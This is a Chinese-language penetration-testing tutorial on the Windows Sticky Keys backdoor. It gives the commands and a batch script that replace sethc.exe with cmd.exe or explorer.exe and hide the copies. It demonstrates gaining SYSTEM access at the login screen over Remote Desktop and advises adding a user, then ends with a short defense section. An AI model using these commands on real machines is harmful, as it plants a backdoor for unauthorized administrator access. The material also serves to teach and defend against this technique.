0x01 shift后门

说到这个东西就先提一下它的来源——Windows粘滞键
Windows粘滞键本身是为了不方便同时按组合键的人群使用的功能，在连按5次shift键后打开粘滞键，也就是启动了system32目录下的sethc.exe

在登入状态中，连按5次shift会以当前用户权限执行sethc.exe，而在登录界面还未登录时会默认以system用户（管理员权限）执行。

0x02 原理

原理也很简单，连按5次shift，windows会在system32目录下寻找sethc.exe并启动，我们只需要把cmd或者其他的shell程序替换掉，那么我们启动sethc.exe的时候就会默认以system用户执行我们的cmd，而且因为是系统自带的应用所以不会被杀毒软件检测

0x03 复现

如果我们在渗透过程中拿到较高权限的shell就可以直接在shell里面执行命令

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

或者在拿到远程桌面后直接在系统里面替换
这里再贴一个用的比较广泛的批处理，具体步骤可以自己分析

@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

我这里拿虚拟机做个演示，先打开3389端口

然后复制cmd到system32目录下并且命名sethc.exe，或者可以下载更隐藏的后门软件，我这里用的是黑基2012的后门，隐蔽性更高

替换成功

接下来我们用主机连接远程桌面试试

启动成功，并且为system权限

因为远程桌面存在时间限制自动断开连接，所以需要尽快添加用户

0x04 防御

防御方法其实也很简单粗暴，就是直接设置权限让所有人都用不了，这样无论是删除还是访问都会显示拒绝访问。
注意，这里不是直接删除，删除后系统可能会自动找回。

其实随着时代的发展，系统的更新换代，在权限分级更严格的今天，这种方法对很多系统已经不管用了，不过重要的是学到一个思路，说不定今后还能遇到用得上的地方呢